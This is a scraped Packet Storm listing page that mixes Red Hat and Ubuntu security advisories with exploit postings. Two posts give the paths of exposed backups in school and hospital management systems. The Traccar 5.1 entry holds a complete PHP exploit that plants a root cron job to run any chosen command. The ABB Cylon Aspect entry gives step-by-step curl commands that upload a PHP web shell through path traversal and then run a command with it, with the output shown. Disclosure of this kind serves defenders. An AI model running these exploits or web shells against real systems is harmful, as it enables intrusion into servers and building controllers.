Red Hat Security Advisory 2024-7074-03 - Network Observability 1.6 for Red Hat OpenShift. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_7074.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: Network Observability 1.6.2 for OpenShift  
Advisory ID:        RHSA-2024:7074-03  
Product:            Network Observability  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:7074  
Issue date:         2024-09-25  
Revision:           03  
CVE Names:          CVE-2024-24791  
====================================================================

Summary: 

Network Observability 1.6 for Red Hat OpenShift

Red Hat Product Security has rated this update as having a security impact of  
Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives  
a detailed severity rating, is available for each vulnerability from the CVE  
link(s) in the References section.

Description:

Network Observability 1.6.2

Security Fix(es):

* CVE-2024-24791 golang: net/http: Denial of service due to improper 100-continue handling in net/http

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2024-24791

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2295310  
https://issues.redhat.com/browse/NETOBSERV-1737

Red Hat Security Advisory 2024-7074-03

Ubuntu Security Notice 7031-1 - It was discovered that Puma incorrectly handled parsing certain headers. A remote attacker could possibly use this issue to overwrite header values set by intermediate proxies by providing duplicate headers containing underscore characters.

    ==========================================================================Ubuntu Security Notice USN-7031-1September 24, 2024puma vulnerability==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 24.04 LTSSummary:Puma could be made to overwrite headers if it received specially craftednetwork traffic.Software Description:- puma: threaded HTTP 1.1 server for Ruby/Rack applicationsDetails:It was discovered that Puma incorrectly handled parsing certain headers.A remote attacker could possibly use this issue to overwrite header valuesset by intermediate proxies by providing duplicate headers containingunderscore characters.Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 24.04 LTS  puma                            6.4.2-4ubuntu4.3In general, a standard system update will make all the necessary changes.References:  https://ubuntu.com/security/notices/USN-7031-1  CVE-2024-45614Package Information:  https://launchpad.net/ubuntu/+source/puma/6.4.2-4ubuntu4.3

Ubuntu Security Notice USN-7031-1

Red Hat Security Advisory 2024-6827-03 - Red Hat OpenShift Container Platform release 4.16.14 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include an open redirection vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6827.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.16.14 security update  
Advisory ID:        RHSA-2024:6827-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6827  
Issue date:         2024-09-24  
Revision:           03  
CVE Names:          CVE-2024-42353  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.16.14 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.16.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the RPM packages for Red Hat OpenShift Container Platform 4.16.14. See the following advisory for the container images for this release:

https://access.redhat.com/errata/RHSA-2024:6824

Security Fix(es):

* webob: WebOb's location header normalization during redirect leads to  
open redirect (CVE-2024-42353)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.16 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.16/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

https://docs.openshift.com/container-platform/4.16/release_notes/ocp-4-16-release-notes.html

CVEs:

CVE-2024-42353

References:

https://access.redhat.com/security/updates/classification/#moderate

Red Hat Security Advisory 2024-6827-03

Red Hat Security Advisory 2024-6824-03 - Red Hat OpenShift Container Platform release 4.16.14 is now available with updates to packages and images that fix several bugs and add enhancements.

    The following advisory data is extracted from:https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6824.jsonRed Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.- Packet Storm Staff====================================================================Red Hat Security AdvisorySynopsis:           Moderate: OpenShift Container Platform 4.16.14 security updateAdvisory ID:        RHSA-2024:6824-03Product:            Red Hat OpenShift EnterpriseAdvisory URL:       https://access.redhat.com/errata/RHSA-2024:6824Issue date:         2024-09-25Revision:           03CVE Names:          CVE-2024-3727====================================================================Summary: Red Hat OpenShift Container Platform release 4.16.14 is now available with updates to packages and images that fix several bugs and add enhancements.This release includes a security update for Red Hat OpenShift Container Platform 4.16.Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.Description:Red Hat OpenShift Container Platform is Red Hat's cloud computingKubernetes application platform solution designed for on-premise or privatecloud deployments.Security Fix(es):* containers/image: digest type does not guarantee valid type(CVE-2024-3727)* golang-protobuf: encoding/protojson, internal/encoding/json: infiniteloop in protojson.Unmarshal when unmarshaling certain forms of invalid JSON(CVE-2024-24786)* Bare Metal Operator: BMO can expose particularly named secrets from othernamespaces via BMH CRD (CVE-2024-43803)For more details about the security issue(s), including the impact, a CVSSscore, acknowledgments, and other related information, refer to the CVEpage(s)listed in the References section.Solution:CVEs:CVE-2024-3727References:https://access.redhat.com/security/updates/classification/#moderatehttps://bugzilla.redhat.com/show_bug.cgi?id=2268046https://bugzilla.redhat.com/show_bug.cgi?id=2274767https://bugzilla.redhat.com/show_bug.cgi?id=2302487https://bugzilla.redhat.com/show_bug.cgi?id=2309536https://issues.redhat.com/browse/OCPBUGS-24386https://issues.redhat.com/browse/OCPBUGS-34518https://issues.redhat.com/browse/OCPBUGS-36855https://issues.redhat.com/browse/OCPBUGS-37046https://issues.redhat.com/browse/OCPBUGS-37763https://issues.redhat.com/browse/OCPBUGS-37937https://issues.redhat.com/browse/OCPBUGS-38021https://issues.redhat.com/browse/OCPBUGS-38058https://issues.redhat.com/browse/OCPBUGS-38502https://issues.redhat.com/browse/OCPBUGS-38911https://issues.redhat.com/browse/OCPBUGS-39082https://issues.redhat.com/browse/OCPBUGS-39179https://issues.redhat.com/browse/OCPBUGS-39287https://issues.redhat.com/browse/OCPBUGS-39496https://issues.redhat.com/browse/OCPBUGS-41540https://issues.redhat.com/browse/OCPBUGS-41555https://issues.redhat.com/browse/OCPBUGS-41619https://issues.redhat.com/browse/OCPBUGS-41677https://issues.redhat.com/browse/OCPBUGS-41806https://issues.redhat.com/browse/OCPBUGS-41886https://issues.redhat.com/browse/OCPBUGS-41910

Red Hat Security Advisory 2024-6824-03

Multi Branch School Management System version 3.5 suffers from a backup disclosure vulnerability.

**Multi Branch School Management System 3.5 Backup Disclosure**

Posted Sep 25, 2024

Authored by indoushka

Multi Branch School Management System version 3.5 suffers from a backup disclosure vulnerability.

tags | exploit, info disclosure

SHA-256 | b4c3fb3408f8d7a80baf2b5ec0b035520c60a8b287134c61abe01863834639ea

Download | Favorite | View

**Multi Branch School Management System 3.5 Backup Disclosure**

    =============================================================================================================================================| # Title     : Multi Branch School Management System 3.5 Backup Disclosure Vulnerability                                                   || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://school.ramomcoder.com/                                                                                              |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Appears to leave backups in a world accessible directory under the document root.  [+] use Payload : /uploads/db_backup/[+] http://127.0.0.1/Multi/uploads/db_backup/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,950)
*   Arbitrary (17,099)
*   BBS (2,859)
*   Bypass (1,925)
*   CGI (1,047)
*   Code Execution (7,919)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,431)
*   DoS (25,293)
*   Encryption (2,395)
*   Exploit (54,302)
*   File Inclusion (4,275)
*   File Upload (1,020)
*   Firewall (822)
*   Info Disclosure (2,922)
*   Intrusion Detection (919)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,304)
*   Local (14,858)
*   Magazine (587)
*   Overflow (13,225)
*   Perl (1,435)
*   PHP (5,281)
*   Proof of Concept (2,412)
*   Protocol (3,749)
*   Python (1,661)
*   Remote (31,903)
*   Root (3,672)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,658)
*   Security Tool (8,050)
*   Shell (3,306)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,731)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,121)
*   Web (10,143)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,304)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,125)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,592)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,327)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,893)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,867)
*   UNIX (9,458)
*   UnixWare (188)
*   Windows (6,772)
*   Other

Multi Branch School Management System 3.5 Backup Disclosure

Red Hat Security Advisory 2024-6818-03 - Red Hat OpenShift Container Platform release 4.15.34 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6818.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Moderate: OpenShift Container Platform 4.15.34 bug fix and security update  
Advisory ID:        RHSA-2024:6818-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6818  
Issue date:         2024-09-25  
Revision:           03  
CVE Names:          CVE-2024-7409  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.15.34 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.15.

Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.15.34. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2024:6821

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.15/release_notes/ocp-4-15-release-notes.html

Security Fix(es):

* QEMU: Denial of Service via Improper Synchronization in QEMU NBD Server  
During Socket Closure (CVE-2024-7409)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.  
All OpenShift Container Platform 4.15 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.15/updating/updating_a_cluster/updating-cluster-cli.html

Solution:

CVEs:

CVE-2024-7409

References:

https://access.redhat.com/security/updates/classification/#moderate  
https://bugzilla.redhat.com/show_bug.cgi?id=2302487  
https://issues.redhat.com/browse/OCPBUGS-35869  
https://issues.redhat.com/browse/OCPBUGS-35922  
https://issues.redhat.com/browse/OCPBUGS-37464  
https://issues.redhat.com/browse/OCPBUGS-37727  
https://issues.redhat.com/browse/OCPBUGS-38065  
https://issues.redhat.com/browse/OCPBUGS-38108  
https://issues.redhat.com/browse/OCPBUGS-38593  
https://issues.redhat.com/browse/OCPBUGS-41340  
https://issues.redhat.com/browse/OCPBUGS-41598  
https://issues.redhat.com/browse/OCPBUGS-41635  
https://issues.redhat.com/browse/OCPBUGS-41701  
https://issues.redhat.com/browse/OCPBUGS-41809  
https://issues.redhat.com/browse/OCPBUGS-41819  
https://issues.redhat.com/browse/OCPBUGS-41946  
https://issues.redhat.com/browse/OCPBUGS-41947  
https://issues.redhat.com/browse/OCPBUGS-41981

Red Hat Security Advisory 2024-6818-03

Red Hat Security Advisory 2024-6811-03 - Red Hat OpenShift Container Platform release 4.13.51 is now available with updates to packages and images that fix several bugs and add enhancements. Issues addressed include a denial of service vulnerability.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_6811.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: OpenShift Container Platform 4.13.51 bug fix and security update  
Advisory ID:        RHSA-2024:6811-03  
Product:            Red Hat OpenShift Enterprise  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:6811  
Issue date:         2024-09-25  
Revision:           03  
CVE Names:          CVE-2023-45142  
====================================================================

Summary: 

Red Hat OpenShift Container Platform release 4.13.51 is now available with updates to packages and images that fix several bugs and add enhancements.

This release includes a security update for Red Hat OpenShift Container Platform 4.13.

Red Hat Product Security has rated this update as having a security impact of  Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Red Hat OpenShift Container Platform is Red Hat's cloud computing Kubernetes application platform solution designed for on-premise or private cloud deployments.

This advisory contains the container images for Red Hat OpenShift Container Platform 4.13.51. See the following advisory for the RPM packages for this release:

https://access.redhat.com/errata/RHBA-2024:6813

Space precludes documenting all of the container images in this advisory. See the following Release Notes documentation, which will be updated shortly for this release, for details about these changes:

https://docs.openshift.com/container-platform/4.13/release_notes/ocp-4-13-release-notes.html

Security Fix(es):

* golang: net/http, x/net/http2: unlimited number of CONTINUATION frames  
causes DoS (CVE-2023-45288)  
* opentelemetry: DoS vulnerability in otelhttp (CVE-2023-45142)  
* opentelemetry-go-contrib: DoS vulnerability in otelgrpc due to unbound  
cardinality metrics (CVE-2023-47108)  
* go-retryablehttp: url might write sensitive information to log file  
(CVE-2024-6104)  
* QEMU: Denial of Service via Improper Synchronization in QEMU NBD Server  
During Socket Closure (CVE-2024-7409)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

All OpenShift Container Platform 4.13 users are advised to upgrade to these updated packages and images when they are available in the appropriate release channel. To check for available updates, use the OpenShift CLI (oc) or web console. Instructions for upgrading a cluster are available at https://docs.openshift.com/container-platform/4.13/updating/updating-cluster-cli.html

Solution:

CVEs:

CVE-2023-45142

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=2245180  
https://bugzilla.redhat.com/show_bug.cgi?id=2251198  
https://bugzilla.redhat.com/show_bug.cgi?id=2268273  
https://bugzilla.redhat.com/show_bug.cgi?id=2294000  
https://bugzilla.redhat.com/show_bug.cgi?id=2302487  
https://issues.redhat.com/browse/OCPBUGS-37921  
https://issues.redhat.com/browse/OCPBUGS-38254  
https://issues.redhat.com/browse/OCPBUGS-38264  
https://issues.redhat.com/browse/OCPBUGS-41515  
https://issues.redhat.com/browse/OCPBUGS-41594  
https://issues.redhat.com/browse/OCPBUGS-41723  
https://issues.redhat.com/browse/OCPBUGS-41786

Red Hat Security Advisory 2024-6811-03

Complete Multi Hospital Management System version 1.0 suffers from a backup disclosure vulnerability.

**Complete Multi Hospital Management System 1.0 Backup Disclosure**

Posted Sep 25, 2024

Authored by indoushka

Complete Multi Hospital Management System version 1.0 suffers from a backup disclosure vulnerability.

tags | exploit, info disclosure

SHA-256 | e760cf3c5b44d7d8984817fcf92204fd9912a026b5d02720406cc72f12ac70ed

Download | Favorite | View

**Complete Multi Hospital Management System 1.0 Backup Disclosure**

    =============================================================================================================================================| # Title     : Complete Multi Hospital Management System 1.0 Backup Disclosure Vulnerability                                               || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits)                                                            || # Vendor    : https://www.campcodes.com/downloads/free-download-complete-multi-hospital-management-system/                                |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Appears to leave backups in a world accessible directory under the document root.  [+] use Payload : /files/backups/[+] http://127.0.0.1/multihospital/files/backups/Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,950)
*   Arbitrary (17,099)
*   BBS (2,859)
*   Bypass (1,925)
*   CGI (1,047)
*   Code Execution (7,919)
*   Conference (693)
*   Cracker (845)
*   CSRF (3,431)
*   DoS (25,293)
*   Encryption (2,395)
*   Exploit (54,302)
*   File Inclusion (4,275)
*   File Upload (1,020)
*   Firewall (822)
*   Info Disclosure (2,922)
*   Intrusion Detection (919)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,304)
*   Local (14,858)
*   Magazine (587)
*   Overflow (13,225)
*   Perl (1,435)
*   PHP (5,281)
*   Proof of Concept (2,412)
*   Protocol (3,749)
*   Python (1,661)
*   Remote (31,903)
*   Root (3,672)
*   Rootkit (530)
*   Ruby (643)
*   Scanner (1,658)
*   Security Tool (8,050)
*   Shell (3,306)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,297)
*   SQL Injection (16,731)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (675)
*   Vulnerability (33,121)
*   Web (10,143)
*   Whitepaper (3,785)
*   x86 (970)
*   XSS (18,304)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,115)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,125)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,592)
*   HPUX (881)
*   iOS (390)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,327)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (490)
*   RedHat (16,893)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,867)
*   UNIX (9,458)
*   UnixWare (188)
*   Windows (6,772)
*   Other

Complete Multi Hospital Management System 1.0 Backup Disclosure

Traccar version 5.1 suffers from a PHP code injection vulnerability.

    =============================================================================================================================================| # Title     : Traccar 5.1 php code injection Vulnerability                                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                            || # Vendor    : https://www.traccar.org/old-versions/                                                                                       |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This PHP script assumes you're targeting a similar HTTP service that allows file uploads and interacting with REST APIs.[+] save payload as poc.php[+] usage : C:\www\test>php poc.php[+] Line 117 : login info : 'root', 'toor', 'indoushka@packetstormsecurity.com', '/');[+] payload :<?phpclass TraccarExploit {    private $host;    private $port;    private $username;    private $password;    private $email;    private $target_uri;    public function __construct($host, $port = 8082, $username = '', $password = '', $email = '', $target_uri = '/') {        $this->host = $host;        $this->port = $port;        $this->username = $username;        $this->password = $password;        $this->email = $email;        $this->target_uri = $target_uri;    }    public function send_request($method, $uri, $data = null, $ctype = 'application/json') {        $url = "http://{$this->host}:{$this->port}{$uri}";        $headers = [            "Content-Type: {$ctype}",        ];        $ch = curl_init($url);        curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        if ($data) {            curl_setopt($ch, CURLOPT_POSTFIELDS, $data);        }        curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);        $response = curl_exec($ch);        curl_close($ch);        return json_decode($response, true);    }    public function register_user() {        echo "Registering new user...\n";        $body = json_encode([            'name' => $this->username,            'email' => $this->email,            'password' => $this->password,            'totpKey' => null        ]);        $res = $this->send_request('POST', $this->target_uri . 'api/users', $body);        if (!$res || $res['code'] !== 200) {            die("Failed to register user. Response: " . print_r($res, true));        }        echo "User registered successfully.\n";    }    public function authenticate() {        echo "Authenticating...\n";        $data = http_build_query([            'email' => $this->email,            'password' => $this->password        ]);        $res = $this->send_request('POST', $this->target_uri . 'api/session', $data, 'application/x-www-form-urlencoded');        if (!$res || $res['code'] !== 200) {            die("Failed to authenticate. Response: " . print_r($res, true));        }        echo "Authenticated successfully.\n";    }    public function upload_cron_file($cmd) {        echo "Adding new device...\n";        $body = json_encode([            'name' => bin2hex(random_bytes(8)),            'uniqueId' => bin2hex(random_bytes(8))        ]);        $res = $this->send_request('POST', $this->target_uri . 'api/devices', $body);        if (!$res || $res['code'] !== 200) {            die("Failed to add device. Response: " . print_r($res, true));        }        $device_id = $res['id'];        $cron_job = "* * * * * root /bin/bash -c '{$cmd}'\n";        $cron_filename = bin2hex(random_bytes(6));        echo "Uploading crontab file...\n";        $file_data = [            'file' => curl_file_create("data://text/plain;base64," . base64_encode($cron_job), 'image/png', "{$cron_filename}.png")        ];        $this->send_request('POST', $this->target_uri . "api/devices/{$device_id}/image", $file_data, 'multipart/form-data');        echo "Cronjob file uploaded successfully. Waiting for execution...\n";    }    public function exploit($cmd) {        $this->register_user();        $this->authenticate();        $this->upload_cron_file($cmd);    }}// Usage example:$exploit = new TraccarExploit('127.0.0.1', 8082, 'root', 'toor', 'indoushka@packetstormsecurity.com', '/');$exploit->exploit('id'); // Replace 'id' with your desired command to execute?>Greetings to :=====================================================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|===================================================================================================

Traccar 5.1 Code Injection

ABB Cylon Aspect version 3.08.01 BMS/BAS controller suffers from a remote code execution vulnerability. The vulnerable uploadFile() function in bigUpload.php improperly reads raw POST data using the php://input wrapper without sufficient validation. This data is passed to the fwrite() function, allowing arbitrary file writes. Combined with an improper sanitization of file paths, this leads to directory traversal, allowing an attacker to upload malicious files to arbitrary locations. Once a malicious file is written to an executable directory, an authenticated attacker can trigger the file to execute code and gain unauthorized access to the building controller.

  
ABB Cylon Aspect 3.08.01 (bigUpload.php) Remote Code Execution

Vendor: ABB Ltd.  
Product web page: https://www.global.abb  
Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio  
                  Firmware: <=3.08.01

Summary: ASPECT is an award-winning scalable building energy management  
and control solution designed to allow users seamless access to their  
building data through standard building protocols including smart devices.

Desc: The ABB BMS/BAS controller suffers from a remote code execution  
vulnerability. The vulnerable uploadFile() function in bigUpload.php  
improperly reads raw POST data using the php://input wrapper without  
sufficient validation. This data is passed to the fwrite() function,  
allowing arbitrary file writes. Combined with an improper sanitization  
of file paths, this leads to directory traversal, allowing an attacker  
to upload malicious files to arbitrary locations. Once a malicious file  
is written to an executable directory, an authenticated attacker can  
trigger the file to execute code and gain unauthorized access to the  
building controller.

Tested on: GNU/Linux 3.15.10 (armv7l)  
           GNU/Linux 3.10.0 (x86_64)  
           GNU/Linux 2.6.32 (x86_64)  
           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz  
           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz  
           PHP/7.3.11  
           PHP/5.6.30  
           PHP/5.4.16  
           PHP/4.4.8  
           PHP/5.3.3  
           AspectFT Automation Application Server  
           lighttpd/1.4.32  
           lighttpd/1.4.18  
           Apache/2.2.15 (CentOS)  
           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)  
           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
                            @zeroscience

Advisory ID: ZSL-2024-5828  
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5828.php  
CVE ID: CVE-2024-6298  
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=2024-6298

21.04.2024

--

$ cat project

                 P   R   O   J   E   C   T

                        .|  
                        | |  
                        |'|            ._____  
                ___    |  |            |.   |' .---"|  
        _    .-'   '-. |  |     .--'|  ||   | _|    |  
     .-'|  _.|  |    ||   '-__  |   |  |    ||      |  
     |' | |.    |    ||       | |   |  |    ||      |  
 ____|  '-'     '    ""       '-'   '-.'    '`      |____  
░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░    
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░   
░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░                                                              
         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░   
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░   
         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░  
         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░                                               

                                                                                                               1.  
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=upload&key=251" \  
> -H "Cookie: PHPSESSID=25131337" \  
> -H "Content-Type: application/x-www-form-urlencoded" \  
> -d "<?php\r\nif ($_GET['j']) {\r\nsystem($_GET['j']);\r\n}\r\n?>"

2.  
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=upload&key=251" \  
> -H "Cookie: PHPSESSID=25131337" \  
> –H "Content-Type: application/x-www-form-urlencoded"

3.  
$ curl -X POST "http://192.168.73.31/bigUpload.php?action=finish" \  
> -H "Cookie: PHPSESSID=25131337" \  
> -H "Content-Type: application/x-www-form-urlencoded" \  
> -d "key=251&name=../../../../../../../home/MIX_CMIX/htmlroot/ZSL.php"

4.  
$ curl http://192.168.73.31/ZSL.php?j=id  
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Source

Packet Storm